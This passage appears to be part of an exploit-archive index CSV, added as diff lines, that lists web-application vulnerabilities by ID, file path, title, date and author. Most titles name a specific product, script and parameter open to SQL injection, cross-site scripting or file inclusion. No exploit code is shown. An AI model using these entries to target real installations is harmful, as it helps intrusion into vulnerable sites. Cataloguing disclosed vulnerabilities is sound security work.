+29195,exploits/asp/webapps/29195.txt,"uPhotoGallery 1.1 - 'Slideshow.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",webapps,asp, +29196,exploits/asp/webapps/29196.txt,"uPhotoGallery 1.1 - 'thumbnails.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",webapps,asp, +29197,exploits/asp/webapps/29197.txt,"Evolve Shopping Cart - 'products.asp' SQL Injection",2006-11-27,"Aria-Security Team",webapps,asp, +29198,exploits/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - '_404_not_found.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",webapps,php, +29199,exploits/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - '_410_stats_gone.page.php?app_name' Cross-Site Scripting",2006-11-16,"lotto fischer",webapps,php, +40371,exploits/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +29200,exploits/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - '_referer_spam.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",webapps,php, +29202,exploits/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - 'polls.php' SQL Injection",2006-11-30,ajann,webapps,php, +29203,exploits/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - 'register.php' Cross-Site Scripting",2006-11-30,blueshisha,webapps,php, +29205,exploits/php/webapps/29205.txt,"Invision Gallery 2.0.7 - 'index.php?IMG' SQL Injection",2006-12-01,infection,webapps,php, +29262,exploits/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",webapps,hardware, +29207,exploits/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - 'Show' SQL Injection",2006-12-01,"Tim Weber",webapps,php, +29231,exploits/asp/webapps/29231.txt,"Dol Storye - 'Dettaglio.asp' Multiple SQL Injections",2006-12-06,WarGame,webapps,asp, +29232,exploits/php/webapps/29232.txt,"Link CMS - 'navigacija.php?IDMeniGlavni' SQL Injection",2006-11-18,"Ivan Markovic",webapps,php, +29233,exploits/php/webapps/29233.txt,"Link CMS - 'prikazInformacije.php?IDStranicaPodaci' SQL Injection",2006-11-18,"Ivan Markovic",webapps,php, +29223,exploits/php/webapps/29223.txt,"Inside Systems Mail 2.0 - 'error.php' Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",webapps,php, +29224,exploits/asp/webapps/29224.txt,"UApplication Uguestbook 1.0 - 'index.asp' SQL Injection",2006-12-04,"Aria-Security Team",webapps,asp, +29225,exploits/php/webapps/29225.txt,"ac4p Mobile - 'up.php?Taaa' Cross-Site Scripting",2006-12-04,SwEET-DeViL,webapps,php, +29226,exploits/php/webapps/29226.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (2)",2006-12-04,SwEET-DeViL,webapps,php, +29227,exploits/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 - 'vf_info.asp?StrMes' Cross-Site Scripting",2006-12-04,St@rExT,webapps,asp, +29228,exploits/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 - 'vf_newtopic.asp' IFRAME Element Cross-Site Scripting",2006-12-04,St@rExT,webapps,asp, +29328,exploits/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,webapps,php, +29237,exploits/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",webapps,php, +29238,exploits/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",webapps,php, +29240,exploits/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp?hata' Cross-Site Scripting",2006-12-08,ShaFuck31,webapps,asp, +29241,exploits/asp/webapps/29241.txt,"MaviPortal - 'Arama.asp' Cross-Site Scripting",2006-12-09,St@rExT,webapps,asp, +29242,exploits/php/webapps/29242.txt,"Messageriescripthp 2.0 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,webapps,php, +29243,exploits/php/webapps/29243.txt,"Messageriescripthp 2.0 - 'existepseudo.php?pseudo' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29244,exploits/php/webapps/29244.txt,"Messageriescripthp 2.0 - 'existeemail.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29245,exploits/php/webapps/29245.txt,"Messageriescripthp 2.0 - '/Contact/contact.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,webapps,php, +29246,exploits/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - '/admin/admin_membre/fiche_membre.php?idmembre' SQL Injection",2006-12-09,Mr_KaLiMaN,webapps,php, +29247,exploits/php/webapps/29247.txt,"AnnonceScriptHP 2.0 - 'erreurinscription.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29248,exploits/php/webapps/29248.txt,"AnnonceScriptHP 2.0 - '/Templates/admin.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29249,exploits/php/webapps/29249.txt,"AnnonceScriptHP 2.0 - '/Templates/commun.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29250,exploits/php/webapps/29250.txt,"AnnonceScriptHP 2.0 - 'membre.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29251,exploits/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - '/admin/admin_config/Aide.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29252,exploits/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - 'email.php?id' SQL Injection",2006-12-09,Mr_KaLiMaN,webapps,php, +29253,exploits/php/webapps/29253.txt,"AnnonceScriptHP 2.0 - 'voirannonce.php?no' SQL Injection",2006-12-09,Mr_KaLiMaN,webapps,php, +29254,exploits/php/webapps/29254.txt,"KDPics 1.11/1.16 - 'index.php3?categories' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29255,exploits/php/webapps/29255.txt,"KDPics 1.11/1.16 - 'galeries.inc.php3?categories' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29258,exploits/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",webapps,php, +29264,exploits/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,webapps,php, +29265,exploits/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 < 4.4 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,webapps,php, +29266,exploits/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-Coded Credentials",2013-10-29,"Mark Stanislav",webapps,hardware, +29267,exploits/php/webapps/29267.txt,"ProNews 1.5 - '/admin/change.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,webapps,php, +29268,exploits/php/webapps/29268.txt,"ProNews 1.5 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,webapps,php, +29269,exploits/php/webapps/29269.txt,"ProNews 1.5 - 'lire-avis.php?aa' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,webapps,php, +29270,exploits/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,webapps,php, +29271,exploits/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - 'login.asp' SQL Injection",2006-12-09,ajann,webapps,asp, +29272,exploits/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting",2006-12-11,Nicokiller,webapps,php, +29280,exploits/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,webapps,php, +29282,exploits/php/webapps/29282.txt,"GenesisTrader 1.0 - 'form.php' Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,webapps,php, +29283,exploits/php/webapps/29283.txt,"GenesisTrader 1.0 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-14,Mr_KaLiMaN,webapps,php, +29284,exploits/php/webapps/29284.txt,"Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",webapps,php, +29288,exploits/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",webapps,asp, +29289,exploits/php/webapps/29289.php,"eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion",2006-12-16,Kacper,webapps,php, +29293,exploits/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - 'Haber.asp' SQL Injection",2006-12-16,ShaFuck31,webapps,asp, +29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php, +29298,exploits/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - 'view.php' Cross-Site Scripting",2006-12-19,"Hacker CooL",webapps,php, +29299,exploits/php/webapps/29299.txt,"Mini Web Shop 2.1.c - 'view.php?Viewcategory.php' Cross-Site Scripting",2006-12-19,Linux_Drox,webapps,php, +29300,exploits/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 - 'Class.TX_RTEHTMLArea_PI1.php' Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",webapps,php, +29301,exploits/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 - Calendar.jsp Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",webapps,jsp, +29303,exploits/php/webapps/29303.txt,"PHPBuilder 0.0.2 - 'HTM2PHP.php' Directory Traversal",2006-11-08,"the master",webapps,php, +29304,exploits/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 - Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",webapps,php, +29292,exploits/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",webapps,windows, +29306,exploits/php/webapps/29306.txt,"A-Blog 1.0 - Cross-Site Scripting",2006-12-22,Fukumori,webapps,php, +29308,exploits/php/webapps/29308.txt,"Oracle Portal 9i/10g - Container_Tabs.jsp Cross-Site Scripting",2006-12-22,"putosoft softputo",webapps,php, +29311,exploits/php/webapps/29311.txt,"Xt-News 0.1 - 'add_comment.php?id_news' Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,webapps,php, +29312,exploits/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,webapps,hardware, +29313,exploits/php/webapps/29313.txt,"Xt-News 0.1 - 'show_news.php?id_news' Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,webapps,php, +29314,exploits/php/webapps/29314.txt,"Xt-News 0.1 - 'show_news.php?id_news' SQL Injection",2006-12-22,Mr_KaLiMaN,webapps,php, +29994,exploits/php/webapps/29994.txt,"Campsite 2.6.1 - 'template.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29995,exploits/php/webapps/29995.txt,"Campsite 2.6.1 - 'TimeUnit.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29318,exploits/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple Cross-Site Scripting / SQL Injection Vulnerabilities",2013-10-31,LiquidWorm,webapps,php, +29326,exploits/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",webapps,php,80 +30207,exploits/asp/webapps/30207.txt,"FuseTalk 4.0 - 'blog/include/common/comfinish.cfm?FTVAR_SCRIPTRUN' Cross-Site Scripting",2007-06-20,"Ivan Almuina",webapps,asp, +30203,exploits/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - 'comersus_optReviewReadExec.asp?id' SQL Injection",2007-06-20,Doz,webapps,asp, +30204,exploits/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - 'comersus_customerAuthenticateForm.asp' redirectUrl Cross-Site Scripting",2007-06-20,Doz,webapps,asp, +29330,exploits/php/webapps/29330.txt,"WordPress Theme Switchblade 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",webapps,php, +29331,exploits/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,webapps,php, +29332,exploits/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",webapps,php, +29333,exploits/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' SQL Injection",2006-12-22,ShaFuq31,webapps,asp, +40370,exploits/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +29334,exploits/cfm/webapps/29334.txt,"Future Internet - 'index.cfm' Multiple SQL Injections",2006-12-23,Linux_Drox,webapps,cfm, +29335,exploits/cfm/webapps/29335.txt,"Future Internet - 'index.cfm?categoryId' Cross-Site Scripting",2006-12-23,Linux_Drox,webapps,cfm, +29336,exploits/asp/webapps/29336.txt,"Chatwm 1.0 - 'SelGruFra.asp' SQL Injection",2006-12-24,ShaFuq31,webapps,asp, +29337,exploits/php/webapps/29337.txt,"TimberWolf 1.2.2 - 'shownews.php' Cross-Site Scripting",2006-12-24,CorryL,webapps,php, +29338,exploits/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",webapps,php, +29342,exploits/php/webapps/29342.txt,"Luckybot 3 - 'DIR' Multiple Remote File Inclusions",2006-12-26,Red_Casper,webapps,php, +29343,exploits/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29344,exploits/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29345,exploits/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29346,exploits/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29347,exploits/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29348,exploits/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29349,exploits/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29350,exploits/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29351,exploits/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29352,exploits/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",webapps,php, +29375,exploits/php/webapps/29375.txt,"Simplog 0.9.3 - 'archive.php' SQL Injection",2007-01-02,"Javor Ninov",webapps,php, +29376,exploits/php/webapps/29376.txt,"VCard Pro - 'gbrowse.php' Cross-Site Scripting",2007-01-02,exexp,webapps,php, +29354,exploits/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting",2013-11-01,Vulnerability-Lab,webapps,php, +29474,exploits/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,webapps,php, +29356,exploits/php/webapps/29356.txt,"WordPress 1.x/2.0.x - 'template.php' HTML Injection",2006-12-27,"David Kierznowski",webapps,php, +29357,exploits/asp/webapps/29357.txt,"Hosting Controller 7C - 'FolderManager.aspx' Directory Traversal",2006-12-27,KAPDA,webapps,asp, +29358,exploits/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp?sent' SQL Injection",2006-12-27,Doz,webapps,asp, +29359,exploits/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - 'content.asp?sent' SQL Injection",2006-12-27,Doz,webapps,asp, +29360,exploits/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - 'members.asp?sent' SQL Injection",2006-12-27,Doz,webapps,asp, +29361,exploits/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - '/applications/SecureLoginManager/inc_secureloginmanager.asp?sent' SQL Injection",2006-12-27,Doz,webapps,asp, +29363,exploits/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29364,exploits/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29365,exploits/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29366,exploits/php/webapps/29366.txt,"PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29367,exploits/php/webapps/29367.txt,"PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29368,exploits/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - 'getdate' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29369,exploits/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29370,exploits/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting",2006-12-27,Lostmon,webapps,php, +29372,exploits/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",webapps,php, +29373,exploits/asp/webapps/29373.txt,"Spooky 2.7 - 'login/register.asp' SQL Injection",2006-12-30,Doz,webapps,asp, +29377,exploits/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",webapps,php, +29378,exploits/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",webapps,php, +29379,exploits/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",webapps,php, +29380,exploits/php/webapps/29380.txt,"AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",webapps,php, +29381,exploits/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",webapps,php, +29382,exploits/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",webapps,php, +29384,exploits/php/webapps/29384.txt,"RI Blog 1.3 - 'search.asp' Cross-Site Scripting",2007-01-05,ShaFuck31,webapps,php, +29385,exploits/asp/webapps/29385.txt,"Kolayindir Download - 'down.asp' SQL Injection",2007-01-05,ShaFuck31,webapps,asp, +29476,exploits/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,webapps,php, +29389,exploits/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,webapps,multiple, +29390,exploits/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,webapps,cgi, +29391,exploits/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,webapps,cgi, +29392,exploits/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,webapps,cgi, +29393,exploits/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,webapps,cgi, +29394,exploits/cgi/webapps/29394.txt,"EditTag 1.2 - 'mkpw_mp.cgi?plain' Cross-Site Scripting",2007-01-05,NetJackal,webapps,cgi, +29395,exploits/cgi/webapps/29395.txt,"EditTag 1.2 - 'mkpw.pl?plain' Cross-Site Scripting",2007-01-05,NetJackal,webapps,cgi, +29396,exploits/cgi/webapps/29396.txt,"EditTag 1.2 - 'mkpw.cgi?plain' Cross-Site Scripting",2007-01-05,NetJackal,webapps,cgi, +29397,exploits/php/webapps/29397.php,"Coppermine Photo Gallery 1.4.11 - SQL Injection",2007-01-05,DarkFig,webapps,php, +29398,exploits/asp/webapps/29398.txt,"Shopstorenow E-Commerce Shopping Cart - 'Orange.asp' SQL Injection",2007-01-06,IbnuSina,webapps,asp, +29401,exploits/asp/webapps/29401.txt,"CreateAuction - 'Cats.asp' SQL Injection",2007-01-08,IbnuSina,webapps,asp, +29404,exploits/php/webapps/29404.txt,"MediaWiki 1.x - 'AJAX index.php' Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",webapps,php, +29405,exploits/php/webapps/29405.txt,"PHPKit 1.6.1 - 'comment.php' SQL Injection",2007-01-09,yorn,webapps,php, +29407,exploits/php/webapps/29407.txt,"Magic Photo Storage Website - '/admin/admin_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29408,exploits/php/webapps/29408.txt,"Magic Photo Storage Website - '/admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29409,exploits/php/webapps/29409.txt,"Magic Photo Storage Website - '/admin/admin_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29410,exploits/php/webapps/29410.txt,"Magic Photo Storage Website - '/admin/add_templates.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29411,exploits/php/webapps/29411.txt,"Magic Photo Storage Website - '/admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29412,exploits/php/webapps/29412.txt,"Magic Photo Storage Website - '/admin/approve_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29413,exploits/php/webapps/29413.txt,"Magic Photo Storage Website - '/admin/delete_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29414,exploits/php/webapps/29414.txt,"Magic Photo Storage Website - '/admin/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29415,exploits/php/webapps/29415.txt,"Magic Photo Storage Website - '/admin/list_members.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +40369,exploits/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +29416,exploits/php/webapps/29416.txt,"Magic Photo Storage Website - '/admin/membership_pricing.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29417,exploits/php/webapps/29417.txt,"Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29418,exploits/php/webapps/29418.txt,"Magic Photo Storage Website - '/include/config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29419,exploits/php/webapps/29419.txt,"Magic Photo Storage Website - '/include/db_config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29420,exploits/php/webapps/29420.txt,"Magic Photo Storage Website - '/user/add_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29421,exploits/php/webapps/29421.txt,"Magic Photo Storage Website - '/user/add_news.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29422,exploits/php/webapps/29422.txt,"Magic Photo Storage Website - '/user/change_catalog_template.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29423,exploits/php/webapps/29423.txt,"Magic Photo Storage Website - '/user/couple_milestone.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29424,exploits/php/webapps/29424.txt,"Magic Photo Storage Website - '/user/couple_profile.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29425,exploits/php/webapps/29425.txt,"Magic Photo Storage Website - '/user/delete_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29426,exploits/php/webapps/29426.txt,"Magic Photo Storage Website - '/user/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29427,exploits/php/webapps/29427.txt,"Magic Photo Storage Website - '/user/login.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29428,exploits/php/webapps/29428.txt,"Magic Photo Storage Website - '/user/logout.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29429,exploits/php/webapps/29429.txt,"Magic Photo Storage Website - '/user/register.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29430,exploits/php/webapps/29430.txt,"Magic Photo Storage Website - '/user/upload_photo.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29431,exploits/php/webapps/29431.txt,"Magic Photo Storage Website - '/user/user_catelog_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29432,exploits/php/webapps/29432.txt,"Magic Photo Storage Website - '/user/user_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29433,exploits/php/webapps/29433.txt,"Magic Photo Storage Website - '/user/user_extend.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29434,exploits/php/webapps/29434.txt,"Magic Photo Storage Website - '/user/user_membership_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29435,exploits/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",webapps,multiple, +29437,exploits/php/webapps/29437.txt,"Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion",2007-01-07,rUnViRuS,webapps,php, +29438,exploits/php/webapps/29438.txt,"Edit-X - 'Edit_Address.php' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, +29442,exploits/php/webapps/29442.html,"phpBB 2.0.21 - 'privmsg.php' HTML Injection",2007-01-11,Demential,webapps,php, +36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple, +29450,exploits/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",webapps,php, +29451,exploits/php/webapps/29451.txt,"All In One Control Panel 1.3.x - 'cp_downloads.php?did' SQL Injection",2007-01-12,Coloss,webapps,php, +29453,exploits/php/webapps/29453.php,"PHP-Nuke 7.x - 'Block-Old_Articles.php' SQL Injection",2007-01-13,Paisterist,webapps,php, +29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,webapps,asp, +29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,webapps,asp, +29477,exploits/php/webapps/29477.txt,"Indexu 5.0/5.3 - 'upgrade.php?gateway' Cross-Site Scripting",2007-01-16,SwEET-DeViL,webapps,php, +29478,exploits/php/webapps/29478.txt,"Indexu 5.0/5.3 - 'suggest_category.php?Error_msg' Cross-Site Scripting",2007-01-16,SwEET-DeViL,webapps,php, +29479,exploits/php/webapps/29479.txt,"Indexu 5.0/5.3 - 'user_detail.php?u' Cross-Site Scripting",2007-01-16,SwEET-DeViL,webapps,php, +29480,exploits/php/webapps/29480.txt,"Indexu 5.0/5.3 - 'tell_friend.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, +29481,exploits/php/webapps/29481.txt,"Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, +29464,exploits/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - 'AdminLien.php' Security Restriction Bypass",2007-01-15,sn0oPy,webapps,php, +29466,exploits/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,webapps,php, +29468,exploits/php/webapps/29468.txt,"Jax Petition Book 3.06 - 'jax_petitionbook.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",webapps,php, +29469,exploits/php/webapps/29469.txt,"Jax Petition 3.06 Book - 'smileys.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",webapps,php, +29472,exploits/php/webapps/29472.txt,"DT_Guestbook 1.0 - 'index.php' Cross-Site Scripting",2007-01-16,"Jesper 